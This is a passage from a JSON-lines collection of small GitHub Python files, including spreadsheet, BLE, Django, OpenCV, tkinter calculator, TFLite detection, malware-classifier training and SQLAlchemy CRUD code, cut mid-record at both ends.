of List Items: \" + str(list.__len__()))\n for item in list:\n print(str(item.code) + \" \" + item.name)\n\n\ndef writeList(ws, list, row, column, sheetname):\n newWs = wb.create_sheet(sheetname)\n i = 0\n for item in list:\n newWs.cell(row + i, column).value = item.code\n newWs.cell(row + i, column + 1).value = item.name\n i += 1\n\n\ndef createEntries(ws):\n entryList = []\n for i in range (1, ws.max_row):\n newEntry = Entry(getRow(ws, i))\n entryList.append(newEntry)\n print(entryList.__len__())\n return entryList\n\n\ndef writeEntryList(entryList, col1, sheetname):\n newWs = wb.create_sheet(sheetname)\n for i in range(1, entryList.__len__()):\n newWs.cell(i, 1).value = entryList[i].nominalCode\n newWs.cell(i, 2).value = entryList[i].transValue\n\n\n\nfilename = input('File name? : ')\noutput = input('Output file :') + '.xlsx'\nwb = load_workbook(filename + '.xlsx')\nws = wb['Sheet1']\ncategorise(ws)\ndeptlist = getList(ws, 1, 2)\nnominalList = getList(ws, 3, 4)\nwriteList(ws, deptlist, 1, 1, 'Departments')\nwriteList(ws, nominalList, 1, 1, 'Nominals')\nentryList = createEntries(ws)\n# staffCosts = searchByNominal(entryList, 7003)\nwriteEntryList(searchByNominal(entryList, 7003), 1, 'Entries')\nsave(wb, output)\nprint(sumcat(ws, 'Staff Costs'))\nprint(sumdept(ws, 101))\nprintList(deptlist)\nprintList(nominalList)\n\n\n","repo_name":"Sheep83/sheetTest","sub_path":"sheetTest.py","file_name":"sheetTest.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17100216206","text":"\nm_cmd = {\n\t'initBle' : {},\n\t'stopScan' : {},\n\t'connectDevice' : {'address': '22:22:22:22:22:22'},\n\t'disconnectDevice' : {},\n\t'requestMtu' : {'mtuSize': 512},\n\t'discoverServices' : {},\n\t'scanDevice' : {},\n\t'cancelBondProcess' : {},\n\t'cancelPairing' : {},\n\t'connectGatt' : {'context': None, 'autoConnect': False, 'callback': None, 'transport':'TRANSPORT_LE', 'phy': 'PHY_LE_1M_MASK' ,'handler':None},\n\t'createBond' : {},\n\t'createInsecureL2capChannel' : {'psm': None},\n\t'createInsecureRfcommSocketToServiceRecord' : {'uuid' : None},\n\t'createL2capChannel' : {'psm': None},\n\t'createRfcommSocketToServiceRecord' : {'uuid': None},\n}\n\nm_hook = [\n\t'BluetoothGattService', 'BleDevice'\n]","repo_name":"eaglelaw/runcase","sub_path":"case_ble/cmd_list.py","file_name":"cmd_list.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28371299990","text":"n=int(input())\n\ncount=0\nwhile True:\n if n>=500:\n count+=n//500\n n%=500\n elif n>=100:\n count+=n//100\n n%=100\n elif n>=50:\n count+=n//50\n n%=50\n elif n>=10:\n count+=n//10\n break \nprint(count)\n\n# 정답\n\nn=1260\ncount=0\n\ncoin_types=[500,100,50,10]\n\nfor coin in coin_types:\n count += n//coin\n n%=coin\n\nprint(count)","repo_name":"jacey-h/Programming-language","sub_path":"Python_code/Greedy/3-1_거스름돈.py","file_name":"3-1_거스름돈.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9648596172","text":"import sysconfig\n\nfrom setuptools import setup\nfrom setuptools.extension import Extension\n\n\nclass get_pybind_include(object):\n def __init__(self, user=False):\n self.user = user\n\n def __str__(self):\n import pybind11\n\n return pybind11.get_include(self.user)\n\n\nsetup(\n name=\"pysarplus\",\n version=\"0.2.6\",\n description=\"SAR prediction for use with PySpark\",\n url=\"https://github.com/Microsoft/Recommenders/contrib/sarplus\",\n author=\"Markus Cozowicz\",\n author_email=\"marcozo@microsoft.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n ],\n setup_requires=[\"pytest-runner\"],\n install_requires=[\"pybind11>=2.2\"],\n tests_require=[\"pytest\"],\n packages=[\"pysarplus\"],\n ext_modules=[\n Extension(\n \"pysarplus_cpp\",\n [\"src/pysarplus.cpp\"],\n include_dirs=[get_pybind_include(), get_pybind_include(user=True)],\n extra_compile_args=sysconfig.get_config_var(\"CFLAGS\").split()\n + [\"-std=c++11\", \"-Wall\", \"-Wextra\"],\n libraries=[\"stdc++\"],\n language=\"c++11\",\n )\n ],\n zip_safe=False,\n)\n","repo_name":"tsinghua-fib-lab/SIGIR21-SURGE","sub_path":"contrib/sarplus/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"70"}
+{"seq_id":"9260353702","text":"import Preprocessor\nimport Utils\nimport Classifier_FCN\nfrom sklearn import preprocessing\nimport numpy as np\n\nif __name__ == \"__main__\":\n config = Utils.readjson(\"config.json\")\n Transformer = Preprocessor.Transformer(\n config[\"advanced\"][\"img_width\"], config[\"advanced\"][\"img_height\"])\n Classifier = Classifier_FCN.Classifier_FCN(\n config[\"advanced\"][\"input_shape\"],\n config[\"model\"][\"nb_classes\"],\n config[\"model\"][\"model_path\"]\n )\n enc = preprocessing.OneHotEncoder()\n enc.fit(np.array(range(config[\"model\"][\"nb_classes\"])).reshape(-1, 1))\n train_size = config[\"data\"][\"train_size\"]\n count = 0\n\n mal_datasets = Utils.scan_file(config[\"data\"][\"mal_train_dataset_dir\"])[0]\n mal_train_datasets = []\n for dataset in mal_datasets:\n\n flag = 0\n for types in config[\"data\"][\"support_type\"]:\n if dataset.find(types) >= 0:\n count = count + 1\n flag = 1\n break\n if flag:\n mal_train_datasets.append(dataset)\n if count > train_size/2:\n break\n\n count = 0\n nor_datasets = Utils.scan_file(config[\"data\"][\"nor_train_dataset_dir\"])[0]\n\n nor_train_datasets = []\n for dataset in nor_datasets:\n flag = 0\n for types in config[\"data\"][\"support_type\"]:\n if dataset.find(types) >= 0:\n flag = 1\n count = count + 1\n break\n if flag:\n nor_train_datasets.append(dataset)\n if count > train_size/2:\n break\n\n y_train = []\n x_train = []\n print(len(nor_train_datasets))\n print(len(mal_train_datasets))\n for i in nor_train_datasets:\n y_train.append(0)\n matrix = Transformer.Load_file(\n config[\"data\"][\"nor_train_dataset_dir\"]+i)\n img = Transformer.transform(matrix)\n img = np.array(img).reshape(\n (config[\"advanced\"][\"img_width\"], config[\"advanced\"][\"img_height\"], 1))\n x_train.append(img)\n print(i+\"\\t0\")\n print(\"读取普通文件结束\")\n for i in mal_train_datasets:\n y_train.append(1)\n matrix = Transformer.Load_file(\n config[\"data\"][\"mal_train_dataset_dir\"]+i)\n img = Transformer.transform(matrix)\n img = np.array(img).reshape(\n (config[\"advanced\"][\"img_width\"], config[\"advanced\"][\"img_height\"], 1))\n x_train.append(img)\n print(i+\"\\t1\")\n print(\"读取恶意文件结束\")\n y_train = enc.transform(np.array(y_train).reshape(-1, 1)).toarray()\n x_train = np.array(x_train)\n\n Classifier.fit(x_train, y_train,\n config[\"model\"][\"batch_size\"], config[\"model\"][\"epoch\"])\n\n print(\"训练结束\")\n","repo_name":"whulizheng/Malware-Detection-Using-NN","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7614038809","text":"from django.shortcuts import render,redirect\nfrom vehiculos.models import Vehiculo\nfrom clientes.models import Cliente\nfrom django.http.response import JsonResponse\n\nfrom .forms import VehiculoForm\n\n# Create your vie ws here.\ndef list_vehiculos_clientes(requets,id):\n cliente = Cliente.objects.get(id=id)\n vehiculos =Vehiculo.objects.filter(cliente_id=id)\n print(vehiculos)\n return render(\n request=requets,\n template_name='vehiculos/lista.html',\n context={\n 'vehiculos':vehiculos,\n 'cliente':cliente\n }\n )\n\ndef get_vehiculos_clientes(requets,id):\n vehiculos =Vehiculo.objects.filter(cliente_id=id).values()\n response={\n 'vehiculos':list(vehiculos)\n }\n return JsonResponse(response)\n\n\ndef nuevo_vehiculo(request,idCliente):\n cliente = Cliente.objects.get(id=idCliente)\n formulario = VehiculoForm(request.POST or None)\n if formulario.is_valid():\n formulario.save()\n return redirect('clientes')\n\n return render(\n request=request,\n template_name='vehiculos/crear.html',\n context={\n 'formulario':formulario,\n 'cliente':cliente\n }\n ) \n\n","repo_name":"Estuardo-Sazo/taller-django","sub_path":"vehiculos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10748948671","text":"import re\n\n\n0_0 # Python >= 3.6 is required\n\ndef fix_color(s):\n match = re.match(r'^rgb[(](\\d+[.]\\d+)%, (\\d+[.]\\d+)%, (\\d+[.]\\d+)%[)]$', s)\n result = ['#']\n for i in range(1, 4):\n v = match.group(i)\n v = float(v)\n v = int(15 * v / 100.0)\n v = f'{v:x}'\n result += [v]\n return ''.join(result)\n\n__all__ = ['fix_color']\n\n# vim:ts=4 sts=4 sw=4 et\n","repo_name":"jwilk/xtsd-toolbox","sub_path":"libxtsd.py","file_name":"libxtsd.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1020442621","text":"import json\n\ndef mapIds():\n champMap = {}\n with open('./champion.json', encoding='utf-8') as file:\n x = file.read()\n x = json.loads(x)\n championList = x['data']\n for champ in championList:\n champKey = x['data'][champ]['key']\n champMap[champKey] = champ\n #print(champMap)\n with open('../src/api/dataDragon/champIds.json', 'w') as json_file:\n json.dump(champMap, json_file)\n\n\nmapIds()","repo_name":"JasonObeid/josh-ints.me","sub_path":"dataDragonSrc/getChampIds.py","file_name":"getChampIds.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72443971108","text":"from __future__ import division, print_function\n\n__author__ = \"adrn \"\n\n# Standard library\nimport os, sys\nimport json\nimport glob\nimport re\n\n#pattr = re.compile(r\"[0-9]{3}\\.[0-9]{2,3}.*$\")\npattr = re.compile(r\"([0-9]{3}\\.[0-9]{2,3})(.*)\")\n\nexpr1 = r\"([A-Za-z\\.]+\\s(?:(?:[A-Za-z]\\.)|(?:[A-Za-z]+))\\s[A-Za-z]+\\s*[0-9]\\,.*)\"\nbad_pattr1 = re.compile(expr1)\nexpr2 = r\"([A-Za-z\\.]+\\s(?:(?:[A-Za-z]\\.)|(?:[A-Za-z]+))\\s[A-Za-z]+\\s*[0-9].*)\"\nbad_pattr2 = re.compile(expr2)\n\nwith open(\"data/aas_abstracts.json\") as f:\n data = json.loads(f.read())\n\nfor ii,filename in enumerate(glob.glob(\"data/aas*.txt\")):\n with open(filename) as f:\n text = f.read()\n\n nfailures = 0\n ntotal = 0\n presentations = dict()\n for jj,match in enumerate(pattr.finditer(text)):\n ntotal += 1\n title = match.groups()[1]\n title = title[2:]\n #m = bad_pattr.search(title)\n #if m is not None or len(title) > 500:\n # if m is not None:\n # print(m.groups())\n if len(title) > 500:\n nfailures += 1\n continue\n\n if ',' in title and '.' in title:\n try:\n groups = bad_pattr1.search(title).groups()\n except:\n try:\n groups = bad_pattr2.search(title).groups()\n except:\n nfailures += 1\n continue\n title = title.replace(groups[0],'')\n\n presentations[jj] = dict(title=title.decode('unicode_escape').encode('ascii','ignore'))\n\n session = dict(presentations=presentations)\n data[str(ii)] = session\n\n print(\"{} failures of {} total\".format(nfailures, ntotal))\n\nwith open(\"data/aas_abstracts.json\", \"w\") as f:\n dump = json.dumps(data)\n f.write(dump)\n\n\n","repo_name":"davidwhogg/AstroWorse","sub_path":"parse_pdftotext.py","file_name":"parse_pdftotext.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71838707747","text":"import cv2\n\n\nclass Camera:\n\n def __init__(self, camera):\n self.vc = cv2.VideoCapture(camera)\n\n def open(self, width=640, height=480, fps=30):\n\n # self.vc.set(1, fps) #set FPS\n # self.vc.set(3, width) # set width\n # self.vc.set(4, height) # set height\n\n return self.vc.isOpened()\n\n def read(self, negative=False):\n if self.open():\n rval, frame = self.vc.read()\n if frame is not None:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n if negative:\n frame = cv2.bitwise_not(frame)\n return frame\n\n # def read_gray(self, negative=False):\n # rval, frame = self.vc.read()\n # if frame is not None:\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2RGB)\n # if negative:\n # frame = cv2.bitwise_not(frame)\n # return frame\n\n def __next__(self):\n if self.open():\n while True:\n ret, frame = self.vc.read()\n if ret:\n ret, buffer = cv2.imencode(\".jpg\", frame)\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + buffer.tobytes() + b'\\r\\n')\n\n","repo_name":"gulyaeve/QCameraFLASK","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"44878267256","text":"import tkinter\nimport customtkinter\n\ncustomtkinter.set_appearance_mode(\"dark\") # Modes: system (default), light, dark\ncustomtkinter.set_default_color_theme(\"green\") # Themes: blue (default), dark-blue, green\n\nroot = customtkinter.CTk() # create CTk window like you do with the Tk window\nroot.title('Calculator')\nroot.geometry(\"500x310\")\n\nfor c in range(5): root.columnconfigure(index=c, weight=1)\nfor r in range(5): root.rowconfigure(index=r, weight=1)\n\n# create main entry and button\nfont_e = customtkinter.CTkFont(family=\"Helvetica\", size=30, weight='bold')\nfont_btn = customtkinter.CTkFont(family=\"Helvetica\", size=20, weight='bold')\nc_entry = customtkinter.CTkEntry(master=root, placeholder_text=\"\", font=font_e, justify=\"right\")\nc_entry.grid(row=0, column=0, columnspan=5, ipadx=6, ipady=6, padx=4, pady=4, sticky=\"nsew\")\n\nbtns = ['7',\"8\",\"9\",\"+\",\"-\",'4',\"5\",\"6\",\"*\",\"/\",'1',\"2\",\"3\",\"**\",\"** 0.5\",\"0\",\".\",\"C\",\"-/+\",\"=\"]\n\nb = 0\nfor r in range(5):\n if r == 0: continue\n for c in range(5):\n cmd = lambda x = btns[b]: calcul(x)\n btn = customtkinter.CTkButton(master=root, text=btns[b], font=font_btn, command=cmd)\n if btns[b]=='=':\n btn.configure(fg_color='#9a2fa5', hover_color='#671f6f')\n btn.grid(row=r, column=c, ipadx=6, ipady=6, padx=4, pady=4, sticky=\"nsew\")\n b += 1\n\n# the calculator\ndef calcul(x):\n if \"=\" in c_entry.get():\n c_entry.delete(0,\"end\")\n return\n\n if x == \"=\":\n try:\n result = eval(c_entry.get())\n c_entry.insert(\"end\",\"=\"+str(result))\n except:\n mw = customtkinter.CTkToplevel(root)\n mw.title('Error')\n mw.geometry(\"300x100\")\n customtkinter.CTkLabel(mw, text=\"Check the data...\").pack(side=\"top\", fill=\"both\", expand=True, padx=40, pady=40)\n return\n\n if x == \"C\":\n c_entry.delete(0, \"end\")\n return \n\n if x == \"-/+\":\n if c_entry.get()[0] == \"-\":\n c_entry.delete(0)\n else:\n c_entry.insert(0,\"-\")\n return\n\n c_entry.insert(\"end\", x)\n return\n\nif __name__ == '__main__':\n root.mainloop()","repo_name":"otolaa/Tkinter","sub_path":"customtkinter/custom_calculator.py","file_name":"custom_calculator.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"20335836977","text":"import hashlib\nimport os\nimport sys\n\ndef file_sign(root, name):\n path = os.path.join(root, name)\n with open(path, 'r') as f:\n content = f.read()\n return [path, os.stat(path).st_size, hashlib.md5(content.encode()).hexdigest()]\n\n\n\nli = []\nfor root, dirs, files in os.walk(sys.argv[1], topdown=False):\n for name in files:\n li.append(file_sign(root, name))\nprint(\"---------------------------\")\ni = 0\nj = 0\nwz = 0\nwhile i < len(li):\n j = i + 1\n wz = 0\n while j < len(li):\n if (li[i][1] == li[j][1]) and (li[i][2] == li[j][2]) and (li[i][1] != -1):\n print(li[j][0])\n li[j][1] = -1\n wz = 1\n j += 1\n if wz == 1:\n print(li[i][0])\n li[i][1] = -1\n print(\"---------------------------\")\n i += 1\n","repo_name":"mateuszkochanek/Python-Course","sub_path":"lista2/zad4/zad4.py","file_name":"zad4.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17066346497","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\n\nimport numpy as np\n\nfrom PIL import Image\n\nimport pprint as pp\n\n#import tensorflow as tf # TF2\nimport tflite_runtime.interpreter as tflite\n\ndef load_labels(filename):\n with open(filename, 'r') as f:\n return [line.strip() for line in f.readlines()]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-i',\n '--image',\n default='/tmp/test1.jpg',\n help='image to be classified')\n parser.add_argument(\n '-m',\n '--model_file',\n default='/tmp/detect.tflite',\n help='.tflite model to be executed')\n parser.add_argument(\n '-l',\n '--label_file',\n default='/tmp/labels.txt',\n help='name of file containing labels')\n parser.add_argument(\n '--input_mean',\n default=128, type=np.uint8,\n help='input_mean')\n parser.add_argument(\n '--input_std',\n default=128, type=np.uint8,\n help='input standard deviation')\n args = parser.parse_args()\n\n interpreter = tflite.Interpreter(model_path=args.model_file)\n interpreter.allocate_tensors()\n\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n # print input and output details\n print(\"==Input Data==\")\n print(\"shape: \", input_details[0]['shape'])\n\n # check the type of the input tensor\n floating_model = input_details[0]['dtype'] == np.float32\n\n print(\"floating_model : \", floating_model)\n\n quant_model = input_details[0]['dtype'] == np.uint8\n\n print(\"quant_model : \", quant_model)\n\n # NxHxWxC, H:1, W:2\n height = input_details[0]['shape'][1]\n width = input_details[0]['shape'][2]\n img = Image.open(args.image).resize((width, height))\n\n # add N dim\n input_data = np.expand_dims(img, axis=0)\n\n if floating_model:\n input_data = (np.float32(input_data) - args.input_mean) / args.input_std\n\n interpreter.set_tensor(input_details[0]['index'], input_data)\n\n interpreter.invoke()\n\n output_data = interpreter.get_tensor(output_details[0]['index'])\n results = np.squeeze(output_data)\n\n top_k = results.argsort()[-5:][::-1]\n labels = load_labels(args.label_file)\n print(\"labels :\", labels)\n\n #for i in top_k:\n # if floating_model:\n # # print('{:08.6f}: {}'.format(float(results[i]), labels[i]))\n # print('this is the floating model results section')\n # else:\n # # print('{:08.6f}: {}'.format(float(results[i] / 255.0), labels[i]))\n # # print('{:08.6f}: {}'.format(float(results[i]/255.0), labels[i]))\n # print(results[i])\n # print(labels[1])\n # print(\"i :\", i)\n print(\"input details\")\n print(input_details)\n print()\n print(\"output details\")\n pp.pprint(output_details)\n print()\n\n print(output_data.shape)\n print()\n print(output_data)\n\n detection_boxes = interpreter.get_tensor(output_details[0]['index'])\n detection_classes = interpreter.get_tensor(output_details[1]['index'])\n detection_scores = interpreter.get_tensor(output_details[2]['index'])\n num_boxes = interpreter.get_tensor(output_details[3]['index'])\n\n num = int(interpreter.get_tensor(output_details[3]['index'])[0])\n\n print('detection_boxes')\n print('detection boxes: ', detection_boxes)\n\n print('detection_classes')\n print('detection_classes ', detection_classes)\n\n print('detection_scores')\n print('detection_scores ', detection_scores)\n\n print('num_boxes')\n print(\"number of boxes: \", num_boxes)\n\n if(num > 0):\n print('num: ', num)\n print('classes :', detection_classes[0])\n 
print('scores :', detection_scores[0])\n #for i in range(int(num_boxes[0])):\n # if detection_scores[0,i] > .5:\n # label_id = detection_classes[0,i]\n # print('label_id : ', label_id)\n\n # References: 1) https://github.com/tensorflow/tensorflow/issues/34761\n # 2) https://stackoverflow.com/questions/59143641/how-to-get-useful-data-from-tflite-object-detection-python\n # The TFLite_Detection_PostProcess custom op node has four outputs\n # detection_boxes: a tensor of shape [1, num_boxes, 4] with normalized coordinates\n # detection_classes: a tensor of shape [1, num_boxes] containing class prediction for each box\n # detection_scores: a tensor of shape [1, num_boxes]\n # num_boxes: a tensor of size 1 containing the number of detected boxes\n\n\n","repo_name":"mmmwembe/cards-training","sub_path":"label_image.py","file_name":"label_image.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1280006104","text":"class Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n \n # 1. heap\n if not lists: return None\n heap = []\n count = 0\n for i, item in enumerate(lists):\n if item: \n count += 1\n heapq.heappush(heap, (item.val, count, item))\n head = head_temp = ListNode(0)\n while len(heap) > 0:\n value, _, node = heapq.heappop(heap)\n head_temp.next = node\n head_temp = head_temp.next\n node = node.next\n if node:\n count += 1\n heapq.heappush(heap, (node.val, count, node))\n return head.next\n \n # merge\n \n def merge_two(l1, l2):\n head = curr = ListNode(0)\n while l1 and l2:\n if l1.val <= l2.val:\n curr.next = l1\n l1 = l1.next\n curr = curr.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n if not l1:\n curr.next = l2\n if not l2: \n curr.next = l1\n return head.next\n n = len(lists)\n if n == 0: return None\n interval = 1\n while interval < n:\n for i in range(0, n - interval, interval * 2):\n lists[i] = merge_two(lists[i], lists[i+interval])\n interval *= 2\n return lists[0] \n","repo_name":"ylt5b/leetcode","sub_path":"23. Merge k Sorted Lists.py","file_name":"23. Merge k Sorted Lists.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24550967370","text":"# -*- coding: utf-8 -*- \n# @Time : 2022/5/3 08:57 \n# @Author : junjie\n# @File : __init__.py\n# 本页代码\"借鉴\"pity\n# pity github: https://github.com/wuranxu/pity\n\n\n\nfrom app.models.base import FunBaseModel\nfrom typing import Type, Union\nfrom loguru import logger\nfrom app.commons.exceptions.global_exception import BusinessException\nfrom app.commons.requests.request_model import BaseBody\nfrom app.commons.responses.response_model import BaseDto\nfrom datetime import datetime\nfrom functools import wraps\nfrom enum import Enum\nfrom app.models import Session\nfrom app.const.enums import DeleteEnum\n\n\n\ndef connect(func):\n \"\"\"\n 自动创建session装饰器\n \"\"\"\n @wraps(func)\n def wrapper(cls, *args, **kwargs):\n try:\n session = kwargs.pop(\"session\", None)\n if session is not None:\n return func(cls, session = session, *args, **kwargs)\n with Session() as ss:\n return func(cls, session = ss, *args, **kwargs)\n except Exception as e:\n import traceback\n logger.exception(traceback.format_exc())\n logger.error(f\"操作{cls.model.__name__}失败, args:{[*args]}, kwargs:{kwargs}, {func.__name__}方法报错: {e}\")\n raise BusinessException(f\"操作数据库失败: {e}\")\n return wrapper\n\n# 只支持单表\nclass BaseCrud(object):\n\n model: Type[FunBaseModel] = None\n\n\n @classmethod\n @connect\n def get_with_params(cls, session: Session, filter_list: list = None,\n _sort: list = None, _fields: Type[BaseDto] = None, _group: list = None, **kwargs):\n \"\"\"\n 查询数据\n :param session: 会话\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param _sort: 排序字段\n :param kwargs: 不定传参,xx = xx\n :param _fields: Dto 过滤查询\n :param _group: 分组\n :return: 查询对象\n \"\"\"\n query_obj = cls.query_wrapper(session, filter_list, _sort, _fields, _group, **kwargs)\n return query_obj.all()\n\n\n @classmethod\n def query_wrapper(cls, session: Session, filter_list: list = None,\n _sort: list = None, _fields: Type[BaseDto] = None, _group: list = None, **kwargs):\n \"\"\"\n 查询数据\n :param session: 会话\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param _sort: 排序字段,[xxx.xxx]\n :param kwargs: 不定传参,xx = xx\n :param _fields: Dto 过滤查询\n :param _group: 分组\n :return: 查询语句\n \"\"\"\n _filter_list = cls.__filter_k_v(filter_list, **kwargs)\n if _fields:\n field_list = []\n for field in _fields.__fields__.keys():\n field_list.append(getattr(cls.model, field))\n query_obj = session.query(*field_list).filter(*_filter_list)\n else:\n query_obj = session.query(cls.model).filter(*_filter_list)\n if _group:\n query_obj = query_obj.group_by(*_group)\n # 有排序字段时,进行排序\n return query_obj.order_by(*_sort) if _sort else query_obj\n\n @classmethod\n def __filter_k_v(cls, filter_list: list = None, not_del: bool = False, **kwargs):\n \"\"\"\n 查询主逻辑\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param kwargs: 不定传参,xx = xx\n :param not_del: nol_del = True时,不过滤删除数据\n :return: filter_list\n \"\"\"\n filter_list = filter_list if filter_list else list()\n # 判断表是否有del_flag字段\n if getattr(cls.model, 'del_flag', None) and not not_del:\n # 只取未删除的数据\n filter_list.append(getattr(cls.model, 'del_flag') == DeleteEnum.no.value)\n for k, v in kwargs.items():\n # 过滤None的字段值,注意 0 和 False\n if v is None:\n continue\n elif isinstance(v, (bool, int)):\n filter_list.append(getattr(cls.model, k) == v)\n else:\n # 判断是否模糊查询,必须字符串,字符串开头%或者结尾%\n like = isinstance(v, str) and (v.startswith(\"%\") or v.endswith(\"%\"))\n if like and v != '%%':\n filter_list.append(getattr(cls.model, k).like(v))\n else:\n filter_list.append(getattr(cls.model, k) == v)\n return 
filter_list\n\n\n\n @classmethod\n @connect\n def get_with_pagination(cls, session: Session, page: int = 1, limit: int = 10, **kwargs):\n \"\"\"\n 分页查询\n :param session: 会话\n :param page: 页码\n :param limit: 大小\n :param kwargs: 不定传参\n :return: 总数,查询对象\n \"\"\"\n query_obj = cls.query_wrapper(session, **kwargs)\n total = query_obj.count()\n return total, query_obj.limit(limit).offset((page - 1) * limit).all()\n\n @classmethod\n @connect\n def get_with_existed(cls, session: Session, filter_list: list = None, **kwargs):\n \"\"\"\n 判断数据是否存在\n :param session: 会话\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param kwargs: 不定传参\n :return:\n \"\"\"\n _filter_list = cls.__filter_k_v(filter_list, **kwargs)\n query = session.query(cls.model).filter(*_filter_list)\n # 获取结果,ant为true或者false\n ant = session.query(query.exists()).scalar()\n return ant\n\n @classmethod\n @connect\n def get_with_first(cls, session: Session, **kwargs):\n \"\"\"\n 获取第一条数据\n :param session: 会话\n :param kwargs: 不定传参\n :return:\n \"\"\"\n sql_obj = cls.query_wrapper(session, **kwargs)\n return sql_obj.first()\n\n\n @classmethod\n @connect\n def get_with_id(cls, session: Session, id: int):\n \"\"\"\n 根据主键id查询数据\n :param session: 会话\n :param id: 主键id\n :return:\n \"\"\"\n sql_obj = cls.query_wrapper(session, id=id)\n return sql_obj.first()\n\n @classmethod\n @connect\n def update_by_id(cls, session: Session, model: Union[dict, BaseBody], user: dict=None, not_null = False, **kwargs):\n \"\"\"\n 通过主键id更新数据\n :param session: 会话\n :param model: 更新模型\n :param user: 更新用户数据\n :param not_null: not_null=True 只有非空字段才更新数据\n :return:\n \"\"\"\n if isinstance(model, dict):\n id = model['id']\n model_dict = model\n else:\n id = model.id\n model_dict = vars(model)\n query = cls.query_wrapper(session, id=id, **kwargs)\n query_obj = query.first()\n if query_obj is None:\n raise BusinessException(\"数据不存在\")\n for var, value in model_dict.items():\n # 如果value是枚举值,得���过xxx.value获取值\n if isinstance(value, Enum): value = value.value\n if not_null:\n # 过滤None的字段值,注意 0 和 False\n if value is None:\n continue\n if isinstance(value, (bool, int)) or value:\n setattr(query_obj, var, value)\n else:\n setattr(query_obj, var, value)\n if user:\n setattr(query_obj, 'update_id', user['id'])\n setattr(query_obj, 'update_name', user['username'])\n session.commit()\n session.refresh(query_obj)\n return query_obj\n\n @classmethod\n @connect\n def update_by_map(cls, session: Session, filter_list: list, user: dict=None, **kwargs):\n \"\"\"\n 批量更新数据\n :param session: 会话\n :param filter_list: 过滤条件\n :param user: 更新人\n :param kwargs: 要更新的数据,k = v\n :return:\n \"\"\"\n # https://docs.sqlalchemy.org/en/14/errors.html#error-bhk3\n if getattr(cls.model, 'update_id') and getattr(cls.model, 'update_name') and user:\n kwargs['update_id'] = user['id']\n kwargs['update_name'] = user['username']\n query_obj = session.query(cls.model).filter(*filter_list)\n query_obj.update(kwargs)\n session.commit()\n return query_obj.all()\n\n\n @classmethod\n @connect\n def insert_by_model(cls, session: Session, model_obj: FunBaseModel):\n \"\"\"\n :param session: 会话\n :param model_obj: 实例化的表\n :return:\n \"\"\"\n session.add(model_obj)\n session.commit()\n session.refresh(model_obj)\n return model_obj\n\n @classmethod\n @connect\n def delete_by_id(cls, session: Session, id: int, user: dict = None, **kwargs):\n \"\"\"\n 通过主键id删除数据\n :param session: 会话\n :param id: 主键id\n :param user: 操作人\n :return:\n \"\"\"\n query = cls.query_wrapper(session, id=id, **kwargs)\n query_obj = query.first()\n if 
